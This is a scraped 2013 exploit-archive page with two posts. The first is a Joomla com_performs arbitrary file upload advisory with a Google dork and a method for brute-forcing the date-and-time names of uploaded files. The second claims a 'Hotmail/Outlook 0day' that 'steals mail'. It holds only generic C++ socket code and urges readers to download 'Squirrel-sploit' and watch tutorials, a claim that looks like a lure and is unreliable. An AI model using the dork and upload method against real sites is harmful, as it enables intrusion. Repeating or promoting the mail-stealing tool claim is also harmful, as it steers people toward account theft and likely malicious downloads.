# Exploit Title: [Joomla Com_performs component arbitary file upload] # Google Dork: inurl:index.php?option=com_performs upload cv # Date : [2012-09-27] # Exploit Author: [Mormoroth] # Vendor Homepage: [http: //www.performs.org.au/] # Version: [2.4 and prior] # Tested on: [Linux/Windows] ------------ Attacker can upload files with uploader form uploaded files go to /joomlaPath/media/uploads this form builder rename uploaded file with simple combinition between date and time for example if you upload file it will renamed to >> 2012-09-28-20-05-Unknown-file.txt [2012-09-28] its current date and [20-05] is time of uploading file (Hour/Minute) And [Unknown] never change,after them your file name by simple brute force you can find upload time which is hard part of guessing your exact uploaded file ------------ From Iran # 619EDDF21B6569C0 1337day.com [2013-09-01] 7FA32A6DFA150769 # |
Saturday, 31 August 2013
Joomla Component com_performs component arbitary file upload
Posted on 21:20 by Eagle Eye
Microsoft Hotmail or Outlook 0day exploit by squirrel sploit
Posted on 00:26 by Eagle Eye
/*
Caution should read this :
English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRg
French Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVA
To exploit this vulnerability you must Download Squirrel-sploit.
English Tutorial : http://www.youtube.com/watch?v=zfsBXz3lmRg
French Tutorial : http://www.youtube.com/watch?v=X_HGCXajyVA
*/
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <winsock.h>
#include <string>
#include <direct.h>
#pragma comment(lib, "wsock32.lib")
using
namespace
std;
#define SERVER_PORT 80
void
header();
int
createConnection(string targetAddr,
int
targetPort);
int
sendTransmission(string message);
string recvTransmission();
void
cleanUp();
WORD
sockVersion;
WSADATA wsaData;
int
sock;
struct
sockaddr_in rserver;
//Setup the server
int
createConnection(string serverIP,
int
port)
{
int
result = 0, len = 0;
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
if
((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror
(
"error: socket()\n"
);
result = 1;
}
rserver.sin_family = AF_INET;
rserver.sin_port = htons(port);
rserver.sin_addr.s_addr = inet_addr(serverIP.c_str());
memset
(&rserver.sin_zero, 0, 8);
len =
sizeof
(
struct
sockaddr_in);
if
((connect(sock, (
struct
sockaddr *)&rserver,
sizeof
(
struct
sockaddr_in))) == -1)
{
perror
(
"error: connect()\n"
);
result = 1;
}
return
result;
}
void
header()
{
printf
(
"________________________________________________________\n"
);
printf
(
" ___ _ _ _ _ _ \n"
);
printf
(
" / __| __ _ _ _(_)_ _ _ _ ___| |___ ____ __| |___(_) |_ \n"
);
printf
(
" \__ \/ _` | || | | '_| '_/ -_) |___(_-< '_ \ / _ \ | _|\n"
);
printf
(
" |___/\__, |\_,_|_|_| |_| \___|_| /__/ .__/_\___/_|\__|\n"
);
printf
(
" |_| |_| \n"
);
printf
(
"\n"
);
printf
(
"_________________________________________________________\n\n"
);
printf
(
"Download : sourceforge.net/projects/squirrelsploit/ \n\n"
);
printf
(
"Tutorial (English): youtube.com/watch?v=zfsBXz3lmRg \n\n"
);
printf
(
" (French) : youtube.com/watch?v=X_HGCXajyVA \n\n"
);
printf
(
"set> stealmail xxxx@hotmail.com \n"
);
}
//Send a message
int
sendTransmission(string message)
{
int
bytes_sent = 0;
bytes_sent = send(sock, message.c_str(), message.length(), 0);
if
(bytes_sent < 0)
{
perror
(
"error: send()\n"
);
exit
(1);
}
return
bytes_sent;
}
//Receive a message
string recvTransmission()
{
string result;
char
*c =
new
char
[1];
int
bytes_recv = 0;
while
(c[0] != NULL)
{
bytes_recv = recv(sock, c, 1, 0);
if
(bytes_recv < 0)
{
perror
(
"error: recv()\n"
);
//exit(1);
}
result += c[0];
}
return
result;
}
//Clean up the connection
void
cleanUp()
{
closesocket(sock);
WSACleanup();
}
# 2497E0FBB782321B 1337day.com [2013-08-31] ED68B33B0E4103BB #
Categories: Exploit